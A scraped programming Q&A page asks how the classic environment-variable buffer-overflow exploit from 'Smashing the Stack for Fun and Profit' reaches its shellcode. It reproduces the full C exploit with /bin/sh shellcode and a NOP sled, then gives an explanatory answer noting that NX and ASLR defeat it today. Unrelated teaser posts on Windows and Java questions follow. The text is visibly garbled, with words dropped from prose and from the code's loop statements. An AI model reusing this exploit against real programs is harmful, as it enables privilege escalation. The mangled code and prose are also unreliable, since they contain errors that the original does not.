c - Buffer overflow with environment variables -


i having trouble understanding 1 of exploits smashing stack fun , profit shown below. in exploit, shellcode stored in environment variable called egg , address of variable repeated in buffer stored in ret. program hope exploit called using ret, supposed cause program jump egg. can explain how jump egg made? looks ret filled address of %esp, not egg.

#include <stdlib.h>  #define default_offset                    0 #define default_buffer_size             512 #define default_egg_size               2048 #define nop                            0x90  char shellcode[] =   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"   "\x80\xe8\xdc\xff\xff\xff/bin/sh";  unsigned long get_esp(void) {    __asm__("movl %esp,%eax"); }  void main(int argc, char *argv[]) {   char *buff, *ptr, *egg;   long *addr_ptr, addr;   int offset=default_offset, bsize=default_buffer_size;   int i, eggsize=default_egg_size;    if (argc > 1) bsize   = atoi(argv[1]);   if (argc > 2) offset  = atoi(argv[2]);   if (argc > 3) eggsize = atoi(argv[3]);     if (!(buff = malloc(bsize))) {     printf("can't allocate memory.\n");     exit(0);   }   if (!(egg = malloc(eggsize))) {     printf("can't allocate memory.\n");     exit(0);   }    addr = get_esp() - offset;   printf("using address: 0x%x\n", addr);    ptr = buff;   addr_ptr = (long *) ptr;   (i = 0; < bsize; i+=4)     *(addr_ptr++) = addr;    ptr = egg;   (i = 0; < eggsize - strlen(shellcode) - 1; i++)     *(ptr++) = nop;    (i = 0; < strlen(shellcode); i++)     *(ptr++) = shellcode[i];    buff[bsize - 1] = '\0';   egg[eggsize - 1] = '\0';    memcpy(egg,"egg=",4);   putenv(egg);   memcpy(buff,"ret=",4);   putenv(buff);   system("/bin/bash"); }

do know program not going work modern pc's. because in modern pc's lots of stack protection mechanisms applied nx, aslr etc. when wrote above program not case. @ time every process stack in same memory location. 

unsigned long get_esp(void) {    __asm__("movl %esp,%eax"); }

the above code return lower memory address assumed "the buffer victim code above address!" when try victim code different offset argument there may chance "return address = shellcode address"! shellcode starts execute! spawn shell!

and egg name environment variable. putenv() needs string in form of "name=string". when execute victim process placing $egg in stack, that's why ret filled %esp. hope got idea.


Comments

Post a Comment

Popular posts from this blog

c++ - CryptStringToBinary API behavior -

i seeing strange behavior cryptstringtobinary cryptography api. please see below code (config: x64 debug): #include "stdafx.h" #include <windows.h> #include <strsafe.h> #include <iostream> #include <exception> void main() { dword dwskip; dword dwflags; dword dwdatalen; //lpcwstr pszinput = l"jaaaaaecaaadzgaaakqaagdnnl1l56bwgfjdgr3rpxtqqqn6daw3usv2emkjym4t"; //this works fine lpcwstr pszinput = l"mytest"; //doesnt work, api returns false,error code 0x0000000d // determine size of byte array , allocate memory. if(! cryptstringtobinary( pszinput, _tcslen( pszinput ) + 1, crypt_string_base64, null, &dwdatalen, &dwskip, &dwflags ) ) { dword dw = getlasterror(); //0x0000000d: data invalid throw std::exception( "error computing byte length." ); } byte *pbytebyte = null; try { ...
Read more

c++ - Correct method for redrawing a layered window -

i have window created ws_ex_layered window style. drawing onto memory bitmap using gdi+, , using updatelayeredwindow update graphical content of layered window. intend use window main window of application, require redraw frequently. seeing layered windows not receive wm_paint windows message [?] , need come appropriate method re-drawing window. optimisation not essential , it's nice have cake , eat too. therefore, in search of "correct" method use. here thoughts far: i guess it's idea render onto off-screen bitmap before bitblt ing or similar. 60 frames rendered per second should (more than?) enough (but how compare other applications' frame rates?). possible solutions: use settimer send wm_timer message on regular basis. useful because through specifying time-out value, can achieve desired frames per second, without requirement measure duration "frame" takes rendered. would cause input or other lags due frequency , speed of m...
Read more

java.util.scanner - How to read and add only numbers to array from a text file -

i'm learning java , have question regarding reading file want read numbers file contains strings well. here example of file: 66.56 "3 java 3-43 5-42 2.1 1 and here coding: public class test { public static void main (string [] args){ if (0 < args.length) { file x = new file(args[0]); try{ scanner in = new scanner( new fileinputstream(x)); arraylist<double> test = new arraylist<>(); while(in.hasnext()){ if(in.hasnextdouble()){ double f=in.nextdouble(); test.add(f);} else {in.next();} } catch(ioexception e) { system.err.println("exception during reading: " + e); } } my problem add 66.56,2.1 , 1 doesn't add 3 after "3 or ignores 3-43 , 5-42 can tell me how skip strings , add doubles here? thanks all said 3 ie; "3, 3-43 , 4-42 strings either u read string , split , check number @ " , - or put in space between characters , integers. jvm after compilation tre...
Read more